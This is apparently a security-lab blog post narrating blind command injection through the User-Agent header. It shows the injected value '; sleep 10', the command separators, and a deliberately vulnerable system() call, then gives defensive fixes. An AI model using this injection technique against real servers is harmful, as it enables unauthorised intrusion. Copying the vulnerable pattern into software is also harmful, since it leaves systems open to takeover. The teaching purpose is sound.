Some vulnerabilities shout.
Errors. Crashes. Weird responses.
But today's bug was different.
The server said nothing.
No output. No message. No error.
Justā¦ silence.
And a 10-second pause.
šÆ The Setup
This lab had another command injection challenge.
But this one was trickier.
The application didn't display command output in the response.
Which meant even if a command executedā¦
You wouldn't see it.
The injection point was hidden somewhere unexpected.
Not a form. Not a URL parameter.
An HTTP header.
Specifically:
User-Agent
Yes ,the same header that usually just tells servers what browser you're using.
But what if the server doesn't just read itā¦
What if it executes it?
š§ The Experiment
To test this idea, I intercepted the request using Burp Suite.
Then I modified the User-Agent header.
Instead of something normal like:
Mozilla/5.0
I added a command separator and a delay command:
; sleep 10
Which tells the server:
Run whatever command it normally runsā¦
Then sleep for 10 seconds.
Then respond.
Then I forwarded the request.
š£ The Result
The page loaded.
But something felt off.
The response didn't come back immediately.
It waited.
1 secondā¦ 3 secondsā¦ 7 secondsā¦
Then the response appeared.
Exactly 10 seconds later.
The page looked normal.
But the delay told the whole story.
The command executed.
The server just didn't show the output.
ā” Why This Works
Some applications pass header values directly into system commands.
Something like:
system("log_user_agent " . $user_agent);
If the header contains command separators like:
; && |
The operating system interprets them as additional commands.
Even if the output is hidden, commands still run.
And timing becomes the signal.
š§ Think About This
Imagine asking someone a secret question.
If the answer is yes, they wait 10 seconds before replying.
If the answer is no, they reply instantly.
You never hear the answer.
But the delay tells you everything.
That's blind command injection.
š„ Why This Is Dangerous
Even without visible output, attackers can still:
ā¢ Execute system commands ā¢ Extract data using timing techniques ā¢ Install malicious tools ā¢ Move deeper into the infrastructure ā¢ Eventually take over the server
All from a hidden header.
š”ļø The Fix
Servers must never execute OS commands using user-controlled headers.
Instead:
ā¢ Sanitize and validate all HTTP headers ā¢ Avoid shell command execution when possible ā¢ Use secure APIs instead of system calls ā¢ Apply strict allowlists for inputs ā¢ Monitor unusual response delays
Security rule: If the server executes hidden input, attackers listen for time.
šÆ Day 24 Takeaway
Today the server didn't print anything.
It didn't reveal command output.
It didn't show errors.
But time told the truth.
Because sometimesā¦
The most dangerous vulnerabilities don't speak.
They just wait.
LESS GOOO š„
When the server stays silentā¦ time becomes the answer.